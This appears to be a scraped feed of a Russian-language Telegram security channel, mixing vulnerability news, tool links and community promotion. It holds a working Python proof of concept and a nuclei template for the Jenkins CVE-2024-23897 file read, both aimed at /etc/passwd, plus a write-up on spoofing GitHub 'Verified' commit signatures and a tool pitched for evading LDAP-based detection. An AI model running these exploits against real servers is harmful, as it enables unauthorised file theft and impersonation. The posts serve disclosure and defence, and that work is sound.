На фоне того, что знать Windows уже недостаточно для пентеста при проектах по внутрянке, следует изучить различные байпассы. Самыми простым примером будет UAC Bypass, который на удивление легко спрятать от AV. Но с развитием СЗИ и появлением (но не распространением) всяких EDR/XDR/и т.д. приходится более изощренно подходить к процессу анализа защищенности.
Как отметил в своём проекте, у некоторых специалистов вырабатывается
Please open Telegram to view this post
VIEW IN TELEGRAM
Jenkins RCE Arbitrary File Read CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
Использование:
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Патч:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
🌚 @poxek
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Патч:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17 2
Похек
Jenkins RCE Arbitrary File Read CVE-2024-23897 Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних…
Jenkins nuclei-template
RCE Arbitrary File Read CVE-2024-23897
Пока официально не добавили в nuclei-template. Я не проверял ещё.Не на чем 😢
🌚 @poxek
RCE Arbitrary File Read CVE-2024-23897
Пока официально не добавили в nuclei-template. Я не проверял ещё.
id: CVE-2024-23897
info:
name: Jenkins < 2.441 - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
reference:
- https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
tags: cve,cve2024,lfi,rce,jenkins
variables:
payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}"
javascript:
- code: |
let m = require('nuclei/net');
let name=(Host.includes(':') ? Host : Host+":80");
let conn,conn2;
try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)}
conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n');
try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)}
conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body)
resp = conn.RecvString(1000)
args:
Body: "{{payload}}"
Host: "{{Hostname}}"
matchers:
- type: dsl
dsl:
- 'contains(response, "No such agent \"")'
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
Что сказать вам? Заключающая статья по играм с Windows на этой неделе, но не последняя на канале
В статье будут раскрыты такие направления, как Сокрытие процессов, Core компоненты, Core механики, а также API Hooking.
Предположу, что для прожжённых самоварчиков это будет БАЗА, но для остальных более чем зайдет)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8 1
Forwarded from КОД ИБ: информационная безопасность
Коллеги, сегодняшний день объявляем днем официальной смены названия нашего Клуба Траектория роста 💪
Теперь новое название Клуба - ЗУБРЫ Кибербеза.
На наш взгляд, оно отлично отражает суть того, что происходит внутри Клуба. А именно реализация миссии Клуба - помогать становиться дорогими и востребованными профессионалами по кибербезопасности, т.е. настоящими зубрами кибербеза.
Сейчас Клуб ориентирован на 3 аудитории:
👨 Студенты и совсем начинающие специалисты в ИБ, которые в Клубе могут набраться новых знаний и навыков
👨🦱 Действующие специалисты по ИБ, которые в Клубе могут увидеть свои сильные профессиональные и личностные стороны, простроить свой карьерный трек и открыть для себя возможность занимать более интересные и высокооплачиваемые позиции
🧔♂️ Руководители по ИБ, которые в Клубе смогут усилить свои управленческие компетенции и взять форматы, реализованные в Клубе, к использованию внутри своих команд
Сейчас к Клубу присоединился партнер - Сергей Зыбнев, с которым у нас грандиозные планы по развитию Клуба.
И уже сегодня всех ждем на пятничной встрече в 18.00 мск, где мы познакомимся с Сергеем и приоткроем наши планы на 2024 год, а заодно спросим вас, чего вы ждете от Клуба/
Сегодняшнюю встречу сделаем открытой, поэтому встретимся на онлайн-трансляции в нашем канале Код ИБ.
Заглядывайте на огонек и присоединяйтесь к Клубу 👋
Теперь новое название Клуба - ЗУБРЫ Кибербеза.
На наш взгляд, оно отлично отражает суть того, что происходит внутри Клуба. А именно реализация миссии Клуба - помогать становиться дорогими и востребованными профессионалами по кибербезопасности, т.е. настоящими зубрами кибербеза.
Сейчас Клуб ориентирован на 3 аудитории:
👨 Студенты и совсем начинающие специалисты в ИБ, которые в Клубе могут набраться новых знаний и навыков
👨🦱 Действующие специалисты по ИБ, которые в Клубе могут увидеть свои сильные профессиональные и личностные стороны, простроить свой карьерный трек и открыть для себя возможность занимать более интересные и высокооплачиваемые позиции
🧔♂️ Руководители по ИБ, которые в Клубе смогут усилить свои управленческие компетенции и взять форматы, реализованные в Клубе, к использованию внутри своих команд
Сейчас к Клубу присоединился партнер - Сергей Зыбнев, с которым у нас грандиозные планы по развитию Клуба.
И уже сегодня всех ждем на пятничной встрече в 18.00 мск, где мы познакомимся с Сергеем и приоткроем наши планы на 2024 год, а заодно спросим вас, чего вы ждете от Клуба/
Сегодняшнюю встречу сделаем открытой, поэтому встретимся на онлайн-трансляции в нашем канале Код ИБ.
Заглядывайте на огонек и присоединяйтесь к Клубу 👋
🐳7🌚3 3
Пару голосов туда сюда, пожалуйста
https://xn--r1a.website/poxek?boost
https://xn--r1a.website/poxek?boost
Telegram
Похек
Проголосуйте за канал, чтобы он получил больше возможностей.
Forwarded from Cybred
Подделка подписей на Github
Перед тем, как что-нибудь закоммитить в репозиторий, git просит пользователя указать имя и email. Если сделать так
Github подхватит почту и будет помечать твои коммиты, как будто их на самом деле сделал Линус, — с его именем, аватаркой и ссылкой на профиль https://github.com/torvalds.
Так может сделать любой, и поэтому существует зеленая надпись "Verified" напротив коммитов, подписанных с помощью GPG.
Если отправить что-нибудь через веб, коммит подпишется от имени
Для этого сырой блоб отправляется на внутренний эндпоинт https://api.github.com/vscs_internal/commit/sign, где его подхватывает
На бэкенде проверяется условие, что строка автора из коммита, полученная с помощью регулярки
Но имя может быть пустым, тогда коммит будет таким
где первая строка — сгенерирована автоматически,
а вторая — фейковая, уже отправленная нами.
Первая не подойдет под регулярку, поэтому будет взята вторая, которую мы контролируем. И так мы можем получить галочку "Verified" на коммит с именем Торвальдса без его подписи, или с любым другим именем.
Автору заплатили $10.000. Баг удалось найти в Codespaces, благодаря реверсу GitHub Enterprise Server Trial VM.
Перед тем, как что-нибудь закоммитить в репозиторий, git просит пользователя указать имя и email. Если сделать так
git config --global user.name "Linus Torvalds"
git config --global user.email "torvalds@linux-foundation.org"
Github подхватит почту и будет помечать твои коммиты, как будто их на самом деле сделал Линус, — с его именем, аватаркой и ссылкой на профиль https://github.com/torvalds.
Так может сделать любой, и поэтому существует зеленая надпись "Verified" напротив коммитов, подписанных с помощью GPG.
Если отправить что-нибудь через веб, коммит подпишется от имени
GitHub <noreply@github.com> и тоже будет считаться верифицированным. Для этого сырой блоб отправляется на внутренний эндпоинт https://api.github.com/vscs_internal/commit/sign, где его подхватывает
gh-gpgsign и возвращает подписанный результат.На бэкенде проверяется условие, что строка автора из коммита, полученная с помощью регулярки
/\Aauthor (.+?) <(.+)>/, должны быть равна имени текущего залогиненного пользователя.Но имя может быть пустым, тогда коммит будет таким
author <583231+octocat@users.noreply.github.com> 1682188800 +0000
author username <user@example.com> 1682188800 +0000
где первая строка — сгенерирована автоматически,
а вторая — фейковая, уже отправленная нами.
Первая не подойдет под регулярку, поэтому будет взята вторая, которую мы контролируем. И так мы можем получить галочку "Verified" на коммит с именем Торвальдса без его подписи, или с любым другим именем.
Автору заплатили $10.000. Баг удалось найти в Codespaces, благодаря реверсу GitHub Enterprise Server Trial VM.
🔥6 1
Forwarded from Пакет Безопасности
'OR 1'='1
Что-то у меня за новогодние праздники подкопилось очень много полезной информации для коллег по цеху, поэтому всем остальным на этой неделе придется еще раз задержать дыхание и немного потерпеть.
В одном из прошлых своих постов я упоминал (это было тут, в контексте премии пентестеров), что изучение отчетов/репортов достаточно сильно расширяет мышление тех, кто трудится в Blue Team и углубляет их познания в специфике Red Team. Так вот, мнение своё я еще не поменял, поэтому всем безопасникам всё также советую почитывать что-то подобное, чтобы быть в курсе актуальных методов эксплуатации уязвимостей, того, как мыслит атакующий и что уже было "пробито".
Собственно, делюсь с вами очень крутым репозиторием в GitHub (ну а где еще), где собраны и регулярно обновляются подборки с теми самыми репортами от этичных хакеров. Авторы заботливо всё отсортировали по типам уязвимостей и даже по отдельным баг-баунти программам различных компаний. Так что вэлкам – сохраняем и распространяем. Можете даже взять себе за привычку регулярно что-то оттуда почитывать по несколько отчётов в день/неделю.
#Полезное
Твой Пакет Безопасности
Что-то у меня за новогодние праздники подкопилось очень много полезной информации для коллег по цеху, поэтому всем остальным на этой неделе придется еще раз задержать дыхание и немного потерпеть.
В одном из прошлых своих постов я упоминал (это было тут, в контексте премии пентестеров), что изучение отчетов/репортов достаточно сильно расширяет мышление тех, кто трудится в Blue Team и углубляет их познания в специфике Red Team. Так вот, мнение своё я еще не поменял, поэтому всем безопасникам всё также советую почитывать что-то подобное, чтобы быть в курсе актуальных методов эксплуатации уязвимостей, того, как мыслит атакующий и что уже было "пробито".
Собственно, делюсь с вами очень крутым репозиторием в GitHub (ну а где еще), где собраны и регулярно обновляются подборки с теми самыми репортами от этичных хакеров. Авторы заботливо всё отсортировали по типам уязвимостей и даже по отдельным баг-баунти программам различных компаний. Так что вэлкам – сохраняем и распространяем. Можете даже взять себе за привычку регулярно что-то оттуда почитывать по несколько отчётов в день/неделю.
#Полезное
Твой Пакет Безопасности
⚡12 4🔥3❤2❤🔥1🤩1
Forwarded from true_security
Аналог sharphound и других сборщиков для bloodhound (и не только), но собирает информацию по протоколу Active Directory Web Services (ADWS) через SOAP запросы.
Впринципе, детекты по LDAP запросам (NTA, SIEM правила и другие детекты аномалий) отвалились(да, но нет))).
https://github.com/FalconForceTeam/SOAPHound
P.S. на контроллерах домена должен быть открыт tcp порт 9389
Впринципе, детекты по LDAP запросам (NTA, SIEM правила и другие детекты аномалий) отвалились(да, но нет))).
https://github.com/FalconForceTeam/SOAPHound
P.S. на контроллерах домена должен быть открыт tcp порт 9389
GitHub
GitHub - FalconForceTeam/SOAPHound: SOAPHound is a custom-developed .NET data collector tool which can be used to enumerate Active…
SOAPHound is a custom-developed .NET data collector tool which can be used to enumerate Active Directory environments via the Active Directory Web Services (ADWS) protocol. - FalconForceTeam/SOAPHound
❤🔥1
1' Мерч, мерч, мерч --
Сейчас компании во время мероприятий чего только не делают в виде мерча с рекламой своих мероприятий. От верхней одежды до практически штанов и трусов. Но надо ли нам это? И да, и нет. Эту проблему подчеркнул у себя Алексей Лукацкий. Понятно что с его опытом посещения мероприятий по всему миру уже сложно чем-то удивить.
А если спуститься на наш, более человечный уровень. То что бы радовало ваш глаз в контекста мерча?Тонкая подводка, не правда ли?) Ещё с прошлого года корпел над идей своего мерча, который в будущем станет неким брендом в ИБ комьюнити. Уже сделали первую идею мерча, которую можно охарактеризовать, как: "Это было пиздец, как смело" )).
Напишите свои идеи по поводу мерча, можно в чат, можно в ЛС @szybnev. Все идеи приветствуются. Если есть реальный пример или просто референс с мероприятий, тем более делитесь. Сделаем мерч под желания комьюнити!
🌚 @poxek
Сейчас компании во время мероприятий чего только не делают в виде мерча с рекламой своих мероприятий. От верхней одежды до практически штанов и трусов. Но надо ли нам это? И да, и нет. Эту проблему подчеркнул у себя Алексей Лукацкий. Понятно что с его опытом посещения мероприятий по всему миру уже сложно чем-то удивить.
А если спуститься на наш, более человечный уровень. То что бы радовало ваш глаз в контекста мерча?
Напишите свои идеи по поводу мерча, можно в чат, можно в ЛС @szybnev. Все идеи приветствуются. Если есть реальный пример или просто референс с мероприятий, тем более делитесь. Сделаем мерч под желания комьюнити!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤🔥2
A Practical Guide to PrintNightmare in 2024
#windows
Хотя теоретически проблема PrintNightmare и ее разновидностей была решена корпорацией Microsoft, она продолжает влиять на организации до сих пор, в основном из-за довольно запутанных групповых политик и настроек. В этой статье автор хочет пролить свет на эти проблемы с настройками и дать четкое руководство по их устранению.
🌚 @poxek
#windows
Хотя теоретически проблема PrintNightmare и ее разновидностей была решена корпорацией Microsoft, она продолжает влиять на организации до сих пор, в основном из-за довольно запутанных групповых политик и настроек. В этой статье автор хочет пролить свет на эти проблемы с настройками и дать четкое руководство по их устранению.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5
Forwarded from Cybred
Благодаря устаревшему OAuth-приложению, хакеры из Midnight Blizzard получили доступ ко всей электронной почте компании, включая руководителей, сотрудников юридического отдела и специалистов по кибербезопасности.
Статья от Hadess про вредоносные OAuth-приложения, по мотивам атаки https://blog.devsecopsguides.com/malicious-use-of-oauth-applications.
Скрытые вектора https://portswigger.net/research/hidden-oauth-attack-vectors
Кликабельный чеклист для пентеста https://www.syncubes.com/oauth2_threat_model
Базовые статьи:
— OAuth 2.0 Hacking Simplified — Part 1 — Understanding Basics
— OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
— Finding and Exploiting Unintended Functionality in Main Web App APIs
❤3
Forwarded from SecuriXy.kz
Apache Tomcat HTTP Request Smuggling (Client-Side Desync)
Recently, a critical vulnerability was discovered in Apache Tomcat, which was assigned the code CVE-2024-21733
https://hackerone.com/reports/2327341
Vulnerable:
from 8.5.7 through 8.5.63
from 9.0.0-M11 through 9.0.43
Patched: 8.5.64 and 9.0.44
#CVE #Tomcat
Recently, a critical vulnerability was discovered in Apache Tomcat, which was assigned the code CVE-2024-21733
https://hackerone.com/reports/2327341
Vulnerable:
from 8.5.7 through 8.5.63
from 9.0.0-M11 through 9.0.43
Patched: 8.5.64 and 9.0.44
#CVE #Tomcat
🔥9
Forwarded from infosec
• Ущерб от вчерашнего массового сбоя в работе доменной зоны RU мог составить примерно 200 млн рублей, посчитали в Центре компетенций НТИ. https://xn--r1a.website/it_secur/1448
• Как объясняют эксперты, речь идет о недополученной прибыли из-за невозможности осуществить покупки в онлайн-магазинах и сервисах.
#Разное
• Как объясняют эксперты, речь идет о недополученной прибыли из-за невозможности осуществить покупки в онлайн-магазинах и сервисах.
#Разное
❤2
Всю прошлую неделю были посты про Windows и прятки в ней против blue team. Подумал, что ущемил Яблочников
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰10❤3👏1
Калькулятор прав пользователя Linux
#полезное
💪 Я иногда туплю, когда не понимаю какие надо циферки писать, при разграничении прав в докере, чтобы он был секурнее. Думаю не у одного такая проблема. Поэтому нашёл удобную штуку под названием Chmod Calculator. Смысл в том, что вы тыкаете чекбоксы что вам нужно и он сам считает численное и буквенное значения прав. Полезная штука для многих, особенно для тех у кого нет в голове чипа Илона калькулятора)
➡️ https://chmod-calculator.com/
🌚 @poxek
#полезное
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚16🔥2🤩2 1